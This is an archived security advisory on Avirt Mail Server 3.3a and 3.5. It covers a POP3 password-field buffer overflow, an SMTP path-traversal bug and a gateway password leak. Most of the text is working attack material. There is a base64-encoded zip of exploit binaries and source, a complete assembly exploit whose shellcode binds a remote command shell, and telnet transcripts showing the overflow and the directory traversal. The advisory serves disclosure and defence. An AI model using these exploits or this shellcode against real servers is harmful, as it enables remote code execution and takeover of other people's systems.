Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: avirtms.htm

Avirt Mail Server 3.3a or 3.5 Exploitable Buffer Overflow



Vulnerability

    Avirt Mail Server

Affected

    Avirt Mail Server 3.3a or 3.5

Description

    Luciano Martins found following.  He found a remotely  exploitable
    buffer overflow in the Avirt Mail  Server 3.3a and a D.o.S in  the
    version 3.5,  (long USER  / PASS:)  that may  allow an attacker to
    execute arbitrary code on the target server.  Example:

        [hell@mordoc]$ telnet example.com 110    <<<< sorry are port 110
        Trying example.com...
        Connected to example.com.
        Escape character is '^]'.
        +OK aVirt Mail POP3 Server Ready
        user itsme
        +OK
        Pass [buffer]

    Where [buffer] is aprox. 856 characters.  At his point the  server
    overflows and crashes.   Just a typical  buffer overflow.   To get
    binary or source code for 3.3a win98 Remote exploit go to

        http://www.ussrback.com/avirtro/

    To get binary or source code for 3.5 D.o.S go to

        http://www.ussrback.com/avirtro/

    These exploits are placed in avirtsc.zip

    ---
    Content-Type: application/octet-stream; name="avirtsc.zip"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="avirtsc.zip"
    Content-MD5: 7v9FUbm//OoJCb83IHqgag==

    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

    -----

    An exploit for Avirt 3.5 (NT) and a temporary patch are  available
    at

        http://www.beavuh.org

    The exploit spawns a command prompt on a port you specify and  the
    patch will prevent this particular overflow.

    ; The binary is available at http://www.beavuh.org.
    ;
    ; To assemble:
    ;
    ; tasm32 -ml avirtx.asm
    ; tlink32 -Tpe -c -x avirtx.obj ,,, import32
    ;
    ; TASM 5 required!
    ;
    ; dark spyrit  <dspyrit@beavuh.org>


    .386p
    locals
    jumps
    .model flat, stdcall


    extrn GetCommandLineA:PROC
    extrn GetStdHandle:PROC
    extrn WriteConsoleA:PROC
    extrn ExitProcess:PROC
    extrn WSAStartup:PROC
    extrn connect:PROC
    extrn send:PROC
    extrn recv:PROC
    extrn WSACleanup:PROC
    extrn gethostbyname:PROC
    extrn htons:PROC
    extrn socket:PROC
    extrn inet_addr:PROC
    extrn closesocket:PROC

    .data
    sploit_length           equ     783

    sploit:
     db "PASS "
     db 016h, 05bh, 05bh, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
     db 090h, 090h, 090h, 090h, 090h, 08bh, 0feh, 033h, 0c0h, 050h, 0f7h, 0d0h
     db 050h, 059h, 0f2h, 0afh, 059h, 0b1h, 0c6h, 08bh, 0c7h, 048h, 080h, 030h
     db 099h, 0e2h, 0fah, 033h, 0f6h, 096h, 0bbh, 099h, 0b0h, 090h, 041h, 0c1h
     db 0ebh, 008h, 056h, 0ffh, 013h, 08bh, 0d0h, 0fch, 033h, 0c9h, 0b1h, 00bh
     db 049h, 032h, 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 052h, 051h, 056h, 052h
     db 0b3h, 08ch, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h, 0ech, 032h, 0c0h, 0ach
     db 084h, 0c0h, 075h, 0f9h, 0b3h, 0b0h, 056h, 0ffh, 013h, 08bh, 0d0h, 0fch
     db 033h, 0c9h, 0b1h, 006h, 032h, 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 052h
     db 051h, 056h, 052h, 0b3h, 08ch, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h, 0ech
     db 083h, 0c6h, 005h, 033h, 0c0h, 050h, 040h, 050h, 040h, 050h, 0ffh, 057h
     db 0e8h, 093h, 06ah, 010h, 056h, 053h, 0ffh, 057h, 0ech, 06ah, 002h, 053h
     db 0ffh, 057h, 0f0h, 033h, 0c0h, 057h, 050h, 0b0h, 00ch, 0abh, 058h, 0abh
     db 040h, 0abh, 05fh, 048h, 050h, 057h, 056h, 0adh, 056h, 0ffh, 057h, 0c0h
     db 048h, 050h, 057h, 0adh, 056h, 0adh, 056h, 0ffh, 057h, 0c0h, 048h, 0b0h
     db 044h, 089h, 007h, 057h, 0ffh, 057h, 0c4h, 033h, 0c0h, 08bh, 046h, 0f4h
     db 089h, 047h, 03ch, 089h, 047h, 040h, 08bh, 006h, 089h, 047h, 038h, 033h
     db 0c0h, 066h, 0b8h, 001h, 001h, 089h, 047h, 02ch, 057h, 057h, 033h, 0c0h
     db 050h, 050h, 050h, 040h, 050h, 048h, 050h, 050h, 0adh, 056h, 033h, 0c0h
     db 050h, 0ffh, 057h, 0c8h, 0ffh, 076h, 0f0h, 0ffh, 057h, 0cch, 0ffh, 076h
     db 0fch, 0ffh, 057h, 0cch, 048h, 050h, 050h, 053h, 0ffh, 057h, 0f4h, 08bh
     db 0d8h, 033h, 0c0h, 0b4h, 004h, 050h, 0c1h, 0e8h, 004h, 050h, 0ffh, 057h
     db 0d4h, 08bh, 0f0h, 033h, 0c0h, 08bh, 0c8h, 0b5h, 004h, 050h, 050h, 057h
     db 051h, 050h, 0ffh, 077h, 0a8h, 0ffh, 057h, 0d0h, 083h, 03fh, 001h, 07ch
     db 022h, 033h, 0c0h, 050h, 057h, 0ffh, 037h, 056h, 0ffh, 077h, 0a8h, 0ffh
     db 057h, 0dch, 00bh, 0c0h, 074h, 02fh, 033h, 0c0h, 050h, 0ffh, 037h, 056h
     db 053h, 0ffh, 057h, 0f8h, 06ah, 050h, 0ffh, 057h, 0e0h, 0ebh, 0c8h, 033h
     db 0c0h, 050h, 0b4h, 004h, 050h, 056h, 053h, 0ffh, 057h, 0fch, 057h, 033h
     db 0c9h, 051h, 050h, 056h, 0ffh, 077h, 0ach, 0ffh, 057h, 0d8h, 06ah, 050h
     db 0ffh, 057h, 0e0h, 0ebh, 0aah, 050h, 0ffh, 057h, 0e4h, 090h, 0d2h, 0dch
     db 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h, 0dah, 0ebh, 0fch, 0f8h, 0edh
     db 0fch, 0c9h, 0f0h, 0e9h, 0fch, 099h, 0deh, 0fch, 0edh, 0cah, 0edh, 0f8h
     db 0ebh, 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh, 0f6h, 0d8h, 099h, 0dah, 0ebh
     db 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 0d8h
     db 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h, 0f8h, 0f7h, 0fdh, 0f5h, 0fch
     db 099h, 0c9h, 0fch, 0fch, 0f2h, 0d7h, 0f8h, 0f4h, 0fch, 0fdh, 0c9h, 0f0h
     db 0e9h, 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh, 0f8h, 0f5h, 0d8h, 0f5h, 0f5h
     db 0f6h, 0fah, 099h, 0ceh, 0ebh, 0f0h, 0edh, 0fch, 0dfh, 0f0h, 0f5h, 0fch
     db 099h, 0cbh, 0fch, 0f8h, 0fdh, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cah, 0f5h
     db 0fch, 0fch, 0e9h, 099h, 0dch, 0e1h, 0f0h, 0edh, 0c9h, 0ebh, 0f6h, 0fah
     db 0fch, 0eah, 0eah, 099h, 0ceh, 0cah, 0d6h, 0dah, 0d2h, 0aah, 0abh, 099h
     db 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h, 0fbh, 0f0h, 0f7h, 0fdh, 099h
     db 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h, 0f8h, 0fah, 0fah, 0fch, 0e9h
     db 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh, 099h, 0ebh, 0fch, 0fah, 0efh, 099h
     db 09bh, 099h
     store dw ?
     db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
     db 099h, 099h, 099h, 099h, 0fah, 0f4h, 0fdh, 0b7h, 0fch, 0e1h, 0fch, 099h
     db 0ffh, 0ffh, 0ffh, 0ffh, 090h, 090h, 090h, 090h, 090h, 05fh, 029h, 040h
     db 000h, 00dh, 00ah

    user db "user beavuh",0dh,0ah,0
    userl equ $-user
    logo  db "aVirt Mail Server 3.5 remote.", 13, 10
          db "by dark spyrit <dspyrit@beavuh.org>",13,10
          db "http://www.beavuh.org",13,10,13,10
          db "usage: avirtx <host> <port> <port to bind shell>", 13, 10
          db "eg - avirtx host.com 110 1234",13,10,0
          logolen equ $-logo


    errorinit db 10,"error initializing winsock.", 13, 10, 0
    errorinitl equ $-errorinit

    derror  db 10,"error.",13,10,0
    derrorl equ $-derror

    nohost db 10,"no host or ip specified.", 13,10,0
    nohostl equ $-nohost

    noport db 10,"no port specified.",13,10,0
    noportl equ $-noport

    no_port2 db 10,"no bind port specified.",13,10,0
    no_port2l equ $-no_port2

    response db 10,"waiting for response....",13,10,0
    respl   equ $-response

    reshost db 10,"error resolving host.",13,10,0
    reshostl equ $-reshost

    sockerr db 10,"error creating socket.",13,10,0
    sockerrl equ $-sockerr

    ipill   db 10,"ip error.",13,10,0
    ipilll   equ $-ipill

    cnerror db 10,"error establishing connection.",13,10,0
    cnerrorl equ $-cnerror

    success db 10,"sent.. spawn connection now.",13,10,0
    successl equ $-success

    console_in      dd      ?
    console_out     dd      ?
    bytes_read      dd      ?

    wsadescription_len equ 256
    wsasys_status_len equ 128

    WSAdata struct
    wVersion dw ?
    wHighVersion dw ?
    szDescription db wsadescription_len+1 dup (?)
    szSystemStatus db wsasys_status_len+1 dup (?)
    iMaxSockets dw ?
    iMaxUdpDg dw ?
    lpVendorInfo dw ?
    WSAdata ends

    sockaddr_in struct
    sin_family dw ?
    sin_port dw ?
    sin_addr dd ?
    sin_zero db 8 dup (0)
    sockaddr_in ends

    wsadata WSAdata <?>
    sin sockaddr_in <?>
    sock dd ?
    numbase dd 10
    _port db 256 dup (?)
    _host db 256 dup (?)
    _port2 db 256 dup (?)
    buffer db 1000 dup (0)

    .code
    start:

	    call    init_console
	    push    logolen
	    push    offset logo
	    call    write_console

	    call    GetCommandLineA
	    mov     edi, eax
	    mov     ecx, -1
	    xor     al, al
	    push    edi
	    repnz   scasb
	    not     ecx
	    pop     edi
	    mov     al, 20h
	    repnz   scasb
	    dec     ecx
	    cmp     ch, 0ffh
	    jz      @@0
	    test    ecx, ecx
	    jnz     @@1
    @@0:
	    push    nohostl
	    push    offset nohost
	    call    write_console
	    jmp     quit3
    @@1:
	    mov     esi, edi
	    lea     edi, _host
	    call    parse
	    or      ecx, ecx
	    jnz     @@2
	    push    noportl
	    push    offset noport
	    call    write_console
	    jmp     quit3
    @@2:
	    lea     edi, _port
	    call    parse
	    or      ecx, ecx
	    jnz     @@3
	    push    no_port2l
	    push    offset no_port2
	    call    write_console
	    jmp     quit3

    @@3:
	    push    ecx
	    lea     edi, _port2
	    call    parse

	    push    offset wsadata
	    push    0101h
	    call    WSAStartup
	    or      eax, eax
	    jz      winsock_found

	    push    errorinitl
	    push    offset errorinit
	    call    write_console
	    jmp     quit3

    winsock_found:
	    xor     eax, eax
	    push    eax
	    inc     eax
	    push    eax
	    inc     eax
	    push    eax
	    call    socket
	    cmp     eax, -1
	    jnz     socket_ok

	    push    sockerrl
	    push    offset sockerr
	    call    write_console
	    jmp     quit2

    socket_ok:
	    mov     sock, eax
	    mov     sin.sin_family, 2

	    mov     ebx, offset _port
	    call    str2num
	    mov     eax, edx
	    push    eax
	    call    htons
	    mov     sin.sin_port, ax

	    mov     ebx, offset _port2
	    call    str2num
	    mov     eax, edx
	    push    eax
	    call    htons
	    xor     ax, 09999h
	    mov     store, ax

	    mov     esi, offset _host
    lewp:
	    xor     al, al
	    lodsb
	    cmp     al, 039h
	    ja      gethost
	    test    al, al
	    jnz     lewp
	    push    offset _host
	    call    inet_addr
	    cmp     eax, -1
	    jnz     ip_aight
	    push    ipilll
	    push    offset ipill
	    call    write_console
	    jmp     quit1

    ip_aight:
	    mov     sin.sin_addr, eax
	    jmp     continue

    gethost:
	    push    offset _host
	    call    gethostbyname
	    test    eax, eax
	    jnz     gothost

	    push    reshostl
	    push    offset reshost
	    call    write_console
	    jmp     quit1

    gothost:
	    mov     eax, [eax+0ch]
	    mov     eax, [eax]
	    mov     eax, [eax]
	    mov     sin.sin_addr, eax

    continue:
	    push    size sin
	    push    offset sin
	    push    sock
	    call    connect
	    or      eax, eax
	    jz      connect_ok
	    push    cnerrorl
	    push    offset cnerror
	    call    write_console
	    jmp     quit1

    connect_ok:
	    push    respl
	    push    offset response
	    call    write_console

	    xor     eax, eax
	    push    eax
	    push    1000
	    push    offset buffer
	    push    sock
	    call    recv
	    or      eax, eax
	    jg      sveet

	    push    derrorl
	    push    offset derror
	    call    write_console
	    jmp     quit1

    sveet:
	    push    eax
	    push    offset buffer
	    call    write_console

	    xor     eax, eax
	    push    eax
	    push    userl
	    push    offset user
	    push    sock
	    call    send

	    xor     eax, eax
	    push    eax
	    push    1000
	    push    offset buffer
	    push    sock
	    call    recv
	    or      eax, eax
	    jg      sveet1

	    push    derrorl
	    push    offset derror
	    call    write_console
	    jmp     quit1
    sveet1:
	    push    eax
	    push    offset buffer
	    call    write_console

	    xor     eax, eax
	    push    eax
	    push    sploit_length
	    push    offset sploit
	    push    sock
	    call    send
	    push    successl
	    push    offset success
	    call    write_console

    quit1:
	    push    sock
	    call    closesocket
    quit2:
	    call    WSACleanup
    quit3:
	    push    0
	    call    ExitProcess
    parse   proc
    ;cheap parsing..
    lewp9:
	    xor     eax, eax
	    cld
	    lodsb
	    cmp     al, 20h
	    jz      done
	    test    al, al
	    jz      done2
	    stosb
	    dec     ecx
	    jmp     lewp9
    done:
	    dec     ecx
    done2:
	    ret
    endp

    str2num proc
	    push    eax ecx edi
	    xor     eax, eax
	    xor     ecx, ecx
	    xor     edx, edx
	    xor     edi, edi
    lewp2:
	    xor     al, al
	    xlat
	    test    al, al
	    jz      end_it
	    sub     al, 030h
	    mov     cl, al
	    mov     eax, edx
	    mul     numbase
	    add     eax, ecx
	    mov     edx, eax
	    inc     ebx
	    inc     edi
	    cmp     edi, 0ah
	    jnz     lewp2

    end_it:
	    pop     edi ecx eax
	    ret
    endp

    init_console  proc
	    push    -10
	    call    GetStdHandle
	    or      eax, eax
	    je      init_error
	    mov     [console_in], eax
	    push    -11
	    call    GetStdHandle
	    or      eax, eax
	    je      init_error
	    mov     [console_out], eax
	    ret
    init_error:
	    push    0
	    call    ExitProcess
    endp

    write_console proc    text_out:dword, text_len:dword
	    pusha
	    push    0
	    push    offset bytes_read
	    push    text_len
	    push    text_out
	    push    console_out
	    call    WriteConsoleA
	    popa
	    ret
    endp

    end     start

    Another 2 bugs concerning Avirt Gateway and Avirt Mail Server  3.3
    and 3.5 follow.

    1) Anybody  with  console  access  could retrieve RAS password  in
       Avirt Gateway.  Changing the username in "Internet  connection"
       properties and pressing "test" button makes Avirt to present  a
       message box  with the password in plaintext.

    2) Anybody on the Intranet could make directories anywhere in  the
       NT running Avirt Mail Server.

        telnet 192.168.0.1 25

        > 220 server aVirt Mail SMTP Server Ready.
         mail from:foo
        > 250 foo, Sender OK
         rcpt to:..\..\..\..\newfolder
        > 250 ..\..\..\..\newfolder, Receipient OK
         data
        > 354 Please enter mail, ending with a "." on a line by itself
         Textinside
         .
        > 250 Mail accepted.

       This will create  a root folder  named "newfolder" with  a file
       inside  it.   Fortunately  it  appears  to  be  impossible   to
       overwrite an existing directory.

Solution

    Nothing yet.  For workaround, see address above.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH